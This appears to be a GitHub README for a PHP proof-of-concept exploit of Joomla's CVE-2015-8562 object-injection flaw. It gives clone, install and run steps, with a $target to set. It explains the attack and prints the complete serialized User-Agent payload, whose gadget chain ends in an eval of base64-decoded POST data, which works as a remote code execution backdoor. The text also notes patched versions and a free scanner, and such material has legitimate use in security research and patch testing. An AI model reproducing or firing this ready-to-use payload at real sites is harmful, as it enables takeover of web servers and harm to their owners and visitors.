A proof of concept for Joomla's CVE-2015-8562 vulnerability
This PoC is a near 1:1 copy of Gary's python implementation hosted at exploit-db.
It's very easy to install:
git clone https://github.com/RobinHoutevelts/Joomla-CVE-2015-8562-PHP-POC.git
cd Joomla-CVE-2015-8562-PHP-POC
composer install
Once composer has everything installed you'll need to change $target in exploit.php.
After that you're ready to go:
php exploit.php
In December 2015 a vulnerability was found in Joomla. It allows remote attackers to conduct PHP object injection attacks and execute arbitrary PHP code via the HTTP User-Agent header.
This vulnerability hit all versions of Joomla. A patch for v1.5.x, v2.5x and v3.x is already released.
If you are running PHP >= 5.4.45, >= 5.5.29 or >= 5.6.13 you are fine as this exploit also utilises CVE-2015-6835.
Nikos Verschore from PatrolServer made a very detailed blog post and was a major help at understanding this vulnerability. You can use their mini-scanner for free to check if your site is at risk.
This is what the sent User-Agent header looks like:
jklmj}__jklmjklmjk|O:21:"JDatabaseDriverMysqli":3:{
s:4:"\0\0\0a";
O:17:"JSimplepieFactory":0:{}
s:21:"\0\0\0disconnectHandlers";
a:1:{
i:0;
a:2:{
i:0;
O:9:"SimplePie":5:{
s:8:"sanitize";
O:20:"JDatabaseDriverMysql":0:{}
s:5:"cache";
b:1;
s:19:"cache_name_function";
s:6:"assert";
s:10:"javascript";
i:9999;
s:8:"feed_url";
s:62:"eval('base64_decode($_POST[111])');JFactory::getConfig();exit;";
}
i:1;
s:4:"init";
}
}
s:13:"\0\0\0connection";
i:1;
}